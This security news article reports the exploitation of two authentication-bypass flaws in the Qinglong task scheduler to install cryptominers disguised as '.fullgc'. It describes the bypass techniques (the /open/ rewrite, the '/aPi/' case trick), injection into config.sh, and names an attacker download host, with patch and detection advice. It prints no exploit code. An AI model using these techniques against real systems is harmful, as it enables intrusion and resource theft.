Qinglong Task Scheduler Flaws Exploited for Crypto Mining

Key Takeaways

• Two CVEs in Qinglong versions 2.20.1 and older allow authentication bypass and remote code execution
• Attackers have deployed cryptominers disguised as '.fullgc' since February 7, before public disclosure
• The effective fix arrived in PR #2941, not the initial mitigation in PR #2924

What Happened

Hackers are actively exploiting two authentication bypass vulnerabilities in Qinglong, an open-source task scheduling tool popular among Chinese developers. The attacks began on February 7, weeks before the security issues were publicly disclosed at the end of the month.

Researchers at cloud-native security company Snyk discovered the exploitation campaign. Qinglong has been forked more than 3,200 times and has over 19,000 stars on GitHub, making it a high-value target.

The attackers chain two flaws to achieve remote code execution, then deploy cryptominers that consume between 85% and 100% of victims' CPU power.

The Two Vulnerabilities

Both flaws affect Qinglong versions 2.20.1 and older. They stem from a mismatch between how security middleware and Express.js handle URL patterns.

• CVE-2026-3965: A misconfigured rewrite rule maps '/open/' requests to '/api/', exposing protected admin endpoints through an unauthenticated path.
• CVE-2026-4047: The authentication check treats paths as case-sensitive (/api/), but the router matches them case-insensitively. Requests like '/aPi/...' bypass authentication entirely.

“Both vulnerabilities stem from a mismatch between the security middleware's assumptions and the framework's behavior. The auth layer assumed certain URL patterns would always be handled one way, while Express.js treated them differently.”

— Snyk researchers

How the Attack Works

Qinglong users first noticed something wrong when a hidden process named '.fullgc' appeared on their systems, maxing out CPU usage. The name was chosen deliberately. It mimics 'Full GC' (garbage collection), an innocuous but resource-intensive process, to avoid raising immediate alarms.

The attackers exploited the flaws to modify Qinglong's config.sh file. They injected shell commands that downloaded a miner binary to '/ql/data/db/.fullgc' and executed it in the background.

The remote server at 'file.551911.xyz' hosted multiple variants of the miner binary: Linux x86_64, ARM64, and macOS versions. This broadened the pool of vulnerable targets.

Snyk confirmed multiple infections across various setups, including instances running behind Nginx with SSL. Network security layers did not stop the attack because the exploitation happened at the application level.

Patching Was Slow and Incomplete

The Qinglong maintainers responded on March 1, nearly a month after exploitation started. The initial patch in pull request #2924 focused on blocking command injection patterns. Snyk says this was insufficient.

The effective fix came in PR #2941, which corrected the authentication bypass in the middleware itself. Users running Qinglong 2.20.1 or older should update immediately.

Who Is at Risk

Anyone running a publicly exposed Qinglong panel on version 2.20.1 or earlier is vulnerable. The tool is primarily used by Chinese developers for automated task scheduling, but its GitHub popularity means it has users worldwide.

Signs of compromise include unexplained high CPU usage and the presence of a '.fullgc' process. Administrators should check for modifications to config.sh and inspect the '/ql/data/db/' directory for suspicious files.

Lessons for Self-Hosted Tools

This incident highlights the risks of running self-hosted open-source tools with public-facing panels. The root cause was subtle: middleware and router disagreed about URL handling. These mismatches are common in Node.js applications built with Express.js.

Security teams should audit any self-hosted tools for similar authentication bypass patterns. Testing should include case variations in URL paths and unexpected route mappings.

Frequently Asked Questions

What is Qinglong and who uses it?

Qinglong is an open-source, self-hosted task scheduling platform popular among Chinese developers. It has over 19,000 GitHub stars and more than 3,200 forks.

How do I know if my Qinglong instance is compromised?

Look for a hidden process named '.fullgc' consuming 85-100% CPU. Check config.sh for unauthorized modifications and inspect '/ql/data/db/' for suspicious files.

Which Qinglong versions are affected?

Versions 2.20.1 and older are vulnerable. The effective fix is available in PR #2941.

Does running Qinglong behind Nginx or SSL protect against this attack?

No. Snyk confirmed infections on setups running behind Nginx with SSL. The exploitation happens at the application level.

What caused these vulnerabilities?

Both flaws stem from a mismatch between security middleware assumptions and Express.js routing behavior, particularly around URL pattern handling and case sensitivity.

Source: BleepingComputer